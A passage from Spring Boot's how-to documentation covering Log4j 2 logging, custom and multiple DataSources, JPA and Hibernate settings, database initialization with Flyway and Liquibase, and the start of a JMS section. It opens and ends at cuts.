`application.properties`, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.file=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the DataSource that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This\nexample uses a more generic `configuration` sub namespace as the example does not support\nmultiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence to anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. Rather than configuring Hibernate to lookup the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the\ndefault. To make it easy to do, you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot. Alternatively, you can just the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand https:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/\\{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected, however they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you like to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default it cannot be transacted. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory 